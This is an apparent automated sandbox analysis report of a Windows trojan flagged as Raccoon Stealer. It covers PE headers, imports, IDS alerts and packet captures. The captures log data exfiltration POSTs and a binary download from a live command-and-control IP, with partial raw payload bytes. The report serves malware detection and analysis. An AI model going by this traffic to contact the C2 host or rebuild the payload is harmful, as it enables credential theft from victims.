IMAGE_DIRECTORY_ENTRY_IAT	0x59000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x57520	0x57600	False	0.964011087268	data	7.9745561755	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x59000	0x31f4	0x3200	False	0.25765625	data	4.21066679958	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5d000	0x8557c	0x1e00	False	0.118229166667	data	1.32535671039	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe3000	0x10bd0	0x10c00	False	0.688243353545	data	6.33192335867	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xe3570	0xea8	data	English	United States
RT_ICON	0xe4418	0x8a8	data	English	United States
RT_ICON	0xe4cc0	0x6c8	data	English	United States
RT_ICON	0xe5388	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe58f0	0x25a8	data	English	United States
RT_ICON	0xe7e98	0x10a8	data	English	United States
RT_ICON	0xe8f40	0x988	data	English	United States
RT_ICON	0xe98c8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe9da8	0x6c8	data	English	United States
RT_ICON	0xea470	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xea9d8	0x25a8	data	English	United States
RT_ICON	0xecf80	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xed428	0xea8	data	English	United States
RT_ICON	0xee2d0	0x8a8	data	English	United States
RT_ICON	0xeeb78	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xef0e0	0x25a8	data	English	United States
RT_ICON	0xf1688	0x10a8	data	English	United States
RT_ICON	0xf2730	0x988	data	English	United States
RT_ICON	0xf30b8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0xf37a8	0x424	data
RT_ACCELERATOR	0xf3588	0x50	data
RT_ACCELERATOR	0xf35d8	0x20	data
RT_GROUP_ICON	0xed3e8	0x3e	data	English	United States
RT_GROUP_ICON	0xe9d30	0x76	data	English	United States
RT_GROUP_ICON	0xf3520	0x68	data	English	United States
RT_VERSION	0xf35f8	0x1b0	data

Imports

DLL

Import

KERNEL32.dll

GetCommandLineW, HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedDecrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, FindNextVolumeW, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetCommandLineA, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA

USER32.dll

GetCursorPos

Exports

Name	Ordinal	Address
@SetViceVariants@12	1	0x401000

Version Infos

Description	Data
InternalName	sajbmiamezu.ise
ProductVersion	8.64.59.5
Copyright	Copyrighz (C) 2021, fudkagat
Translation	0x0127 0x0081

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/27/21-23:55:24.661582	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49745	80	192.168.2.3	185.138.164.150
09/27/21-23:55:27.794083	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49745	80	192.168.2.3	185.138.164.150
09/27/21-23:55:35.209006	TCP	2033974	ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt	49745	80	192.168.2.3	185.138.164.150

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 23:55:23.672564030 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.672602892 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.672676086 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.677145004 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.677162886 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.782082081 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.782202005 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.784280062 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:23.784290075 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.784584045 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:23.975723028 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.014197111 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.055144072 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076370955 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076400042 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076428890 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076492071 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.076503992 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.076535940 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.078093052 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.078135014 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.078222036 CEST	49744	443	192.168.2.3	149.154.167.99
Sep 27, 2021 23:55:24.078243017 CEST	443	49744	149.154.167.99	192.168.2.3
Sep 27, 2021 23:55:24.084980965 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.119972944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.120140076 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.120461941 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.120522976 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.154823065 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.154850006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629426003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629452944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629466057 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629476070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629508018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629730940 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.629698992 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.629918098 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.661581993 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.696244955 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899183035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899215937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899272919 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899341106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899398088 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.899436951 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.899614096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899766922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899840117 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.899844885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899862051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.899923086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.901185036 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.901218891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.901292086 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.937521935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.937587976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.937705040 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.939920902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940005064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940052032 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940088987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940121889 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940135002 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940160036 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940186977 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940224886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940247059 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940273046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940330029 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940332890 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940368891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940411091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940444946 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940469027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940521955 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940526962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940577984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940619946 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940633059 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940658092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940689087 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.940710068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.940977097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.941165924 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.974735022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.974771023 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.974843979 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.976540089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.976573944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.976669073 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.978956938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.978975058 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.979358912 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:24.981359005 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981408119 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981430054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981447935 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981472015 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:24.981497049 CEST	80	49745	185.138.164.150	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 23:55:23.647499084 CEST	57875	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:23.660597086 CEST	53	57875	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:39.494781971 CEST	54154	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:39.525029898 CEST	53	54154	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:57.043615103 CEST	52806	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:57.123997927 CEST	53	52806	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:57.740303040 CEST	53910	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:57.825221062 CEST	53	53910	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:58.354593992 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:58.436990976 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:58.828676939 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:58.835969925 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:58.841284990 CEST	53	60784	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:58.868156910 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:59.409816027 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:59.425090075 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:59.818212032 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:59.831110954 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:00.313652039 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:00.328525066 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:01.259505987 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:01.271882057 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:02.819603920 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:02.833303928 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:03.613842964 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:03.626836061 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:07.029476881 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:07.049738884 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:07.323697090 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:07.342268944 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:08.845547915 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:08.858745098 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:13.022697926 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:13.049321890 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:15.579526901 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:15.600047112 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:26.114584923 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:26.127346039 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:40.086504936 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:40.100507975 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:59.318882942 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:59.332376003 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 27, 2021 23:57:23.082950115 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:57:23.096355915 CEST	53	53777	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 23:55:23.647499084 CEST	192.168.2.3	8.8.8.8	0x57e6	Standard query (0)	t.me	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 23:55:23.660597086 CEST	8.8.8.8	192.168.2.3	0x57e6	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

t.me

185.138.164.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49744	149.154.167.99	443	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49745	185.138.164.150	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 23:55:24.120461941 CEST	930	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 185.138.164.150
Sep 27, 2021 23:55:24.629426003 CEST	931	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:24 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 66 33 37 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 63 50 74 4e 62 35 73 2f 55 45 79 35 35 52 4d 2b 61 63 65 74 4f 7a 38 59 4d 56 34 51 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 59 46 36 2b 6e 68 50 73 2b 38 77 4b 56 71 32 38 78 30 5a 6d 33 48 5a 6b 53 32 6b 49 68 75 39 6f 4e 39 30 59 53 4e 37 47 42 4a 4f 69 67 49 72 37 34 30 75 66 70 57 4f 51 49 4c 47 59 6d 57 58 72 4b 62 32 31 36 61 75 38 46 59 55 66 33 32 46 2b 6f 65 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 53 6f 2b 47 38 34 68 72 4f 59 79 74 4f 35 4a 4e 30 42 74 59 4f 54 5a 78 7a 5a 70 32 6c 64 70 53 4f 64 31 63 39 34 56 4e 35 5a 78 47 38 6c 68 4d 49 78 57 33 6a 31 6e 35 64 39 79 68 32 56 34 48 6f 4e 2f 4e 2b 68 34 61 34 6a 54 34 7a 6d 61 68 53 59 56 37 44 6e 73 73 68 55 6b 64 31 79 4b 5a 31 48 6a 49 48 56 34 50 48 79 37 38 34 48 59 71 6f 73 78 45 7a 6c 35 55 74 42 63 32 6b 33 62 35 67 61 4b 5a 30 44 49 61 71 4f 50 32 58 63 4f 64 5a 6b 6f 63 45 77 53 62 69 43 4b 38 79 62 71 36 76 45 61 79 4a 34 5a 4f 41 30 54 2b 42 6f 51 37 6e 38 6a 6a 7a 59 4a 78 42 46 4e 46 51 76 6a 61 73 73 57 58 4f 49 72 55 6b 69 39 70 7a 2b 61 38 42 41 74 79 35 41 52 2b 77 6b 33 65 57 31 33 77 30 44 59 79 31 31 6b 34 33 6a 4e 69 38 65 70 4e 36 39 52 54 5a 54 70 56 7a 49 74 74 31 55 57 55 70 75 37 57 39 65 54 7a 79 39 36 4a 47 41 59 74 30 4d 79 44 38 6c 75 49 49 49 43 54 6f 39 69 4f 65 4f 6b 39 59 35 62 6a 43 2b 68 79 49 79 64 64 44 70 62 6a 44 71 4f 33 39 37 46 7a 45 73 67 5a 65 4c 46 34 65 32 54 6f 64 6f 54 79 30 6d 49 52 76 48 63 62 69 4e 70 71 71 54 50 4c 57 54 53 4b 67 56 64 32 72 66 79 7a 74 79 50 41 34 50 39 47 35 4a 55 47 76 48 47 77 49 47 44 33 58 65 46 4a 35 52 58 33 55 7a 74 49 74 62 45 76 2b 77 35 30 69 34 32 47 33 62 47 72 48 35 34 72 35 6a 74 45 68 68 73 76 54 33 77 62 42 35 32 2b 55 72 66 78 57 73 51 66 44 34 6c 31 63 51 78 76 50 55 69 56 36 69 4d 6d 48 36 68 6c 52 4f 46 6f 71 78 4d 79 35 4d 62 35 48 37 66 41 50 70 42 48 59 49 71 61 57 49 4e 57 50 46 55 76 38 5a 6f 7a 57 58 71 41 31 47 59 6b 32 69 2b 2b 38 67 44 58 36 68 32 31 46 41 2b 38 6b 61 32 6b 42 77 31 59 64 53 4c 4e 72 70 4f 6c 55 71 6b 55 56 73 50 44 6c 41 46 69 69 74 53 2b 38 52 75 70 6a 5a 48 5a 53 72 73 74 6e 44 32 4c 7a 38 72 70 65 34 71 48 64 69 45 64 65 4d 54 38 57 42 2f 65 78 55 49 62 33 30 48 42 46 44 6a 76 68 71 53 61 64 64 57 36 75 4f 6a 4d 63 45 72 58 2f 38 30 35 33 68 71 71 65 4b 33 70 46 54 51 38 6b 79 5a 66 6e 4d 2f 63 6a 66 69 4c 78 31 4f 6a 43 35 2b 38 6f 53 78 37 53 46 2b 58 56 43 48 4f 4e 56 77 30 75 75 64 49 35 42 33 61 31 62 71 64 67 6a 59 57 76 4e 38 2f 32 4b 70 48 36 6c 41 33 36 48 4e 79 2b 50 49 74 45 54 5a 71 74 6a 2b 6f 44 59 55 38 73 63 68 75 6d 65 6e 6d 51 59 78 66 70 43 78 61 45 59 32 70 75 6e 56 31 65 45 7a 2b 57 73 6e 78 56 58 58 36 48 43 4f 31 57 33 48 31 6d 47 48 6e 43 48 4c 39 55 69 30 4a 39 71 72 32 58 6e 78 51 59 6b 46 33 71 4f 42 68 58 33 6e 4a 65 4a 48 48 41 74 64 49 49 49 75 2f 4f 69 4e 49 31 30 73 66 50 77 52 70 4c 7a 47 5a 64 67 34 72 52 30 65 78 41 4b 50 78 37 43 33 46 4e 41 62 78 35 65 2f 41 6e 38 31 54 43 6a 58 71 75 34 63 67 6b 75 4a 73 74 71 4e 55 43 43 46 6a 48 77 67 7a 50 4c 33 42 51 68 54 48 4e 4a 64 54 4e 55 51 71 4a 44 4f 4a 34 32 5a 71 63 45 6c 7a 4c 36 6a 38 73 53 37 6d 64 66 45 33 39 76 46 33 48 63 64 33 76 68 79 74 66 4e 4a 35 71 58 50 51 46 44 61 74 42 53 34 30 68 53 4c 75 79 53 52 32 32 73 37 33 75 35 38 4a 58 55 66 4b 55 66 7a 47 2b 74 Data Ascii: f37unN2GK+nPmcPtNb5s/UEy55RM+acetOz8YMV4Q3WAOVMT0Fbn38HbQYF6+nhPs+8wKVq28x0Zm3HZkS2kIhu9oN90YSN7GBJOigIr740ufpWOQILGYmWXrKb216au8FYUf32F+oe4b124vbL7XayDSfkgSo+G84hrOYytO5JN0BtYOTZxzZp2ldpSOd1c94VN5ZxG8lhMIxW3j1n5d9yh2V4HoN/N+h4a4jT4zmahSYV7DnsshUkd1yKZ1HjIHV4PHy784HYqosxEzl5UtBc2k3b5gaKZ0DIaqOP2XcOdZkocEwSbiCK8ybq6vEayJ4ZOA0T+BoQ7n8jjzYJxBFNFQvjassWXOIrUki9pz+a8BAty5AR+wk3eW13w0DYy11k43jNi8epN69RTZTpVzItt1UWUpu7W9eTzy96JGAYt0MyD8luIIICTo9iOeOk9Y5bjC+hyIyddDpbjDqO397FzEsgZeLF4e2TodoTy0mIRvHcbiNpqqTPLWTSKgVd2rfyztyPA4P9G5JUGvHGwIGD3XeFJ5RX3UztItbEv+w50i42G3bGrH54r5jtEhhsvT3wbB52+UrfxWsQfD4l1cQxvPUiV6iMmH6hlROFoqxMy5Mb5H7fAPpBHYIqaWINWPFUv8ZozWXqA1GYk2i++8gDX6h21FA+8ka2kBw1YdSLNrpOlUqkUVsPDlAFiitS+8RupjZHZSrstnD2Lz8rpe4qHdiEdeMT8WB/exUIb30HBFDjvhqSaddW6uOjMcErX/8053hqqeK3pFTQ8kyZfnM/cjfiLx1OjC5+8oSx7SF+XVCHONVw0uudI5B3a1bqdgjYWvN8/2KpH6lA36HNy+PItETZqtj+oDYU8schumenmQYxfpCxaEY2punV1eEz+WsnxVXX6HCO1W3H1mGHnCHL9Ui0J9qr2XnxQYkF3qOBhX3nJeJHHAtdIIIu/OiNI10sfPwRpLzGZdg4rR0exAKPx7C3FNAbx5e/An81TCjXqu4cgkuJstqNUCCFjHwgzPL3BQhTHNJdTNUQqJDOJ42ZqcElzL6j8sS7mdfE39vF3Hcd3vhytfNJ5qXPQFDatBS40hSLuySR22s73u58JXUfKUfzG+t
Sep 27, 2021 23:55:24.661581993 CEST	937	OUT	GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 27, 2021 23:55:24.899183035 CEST	938	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:24 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 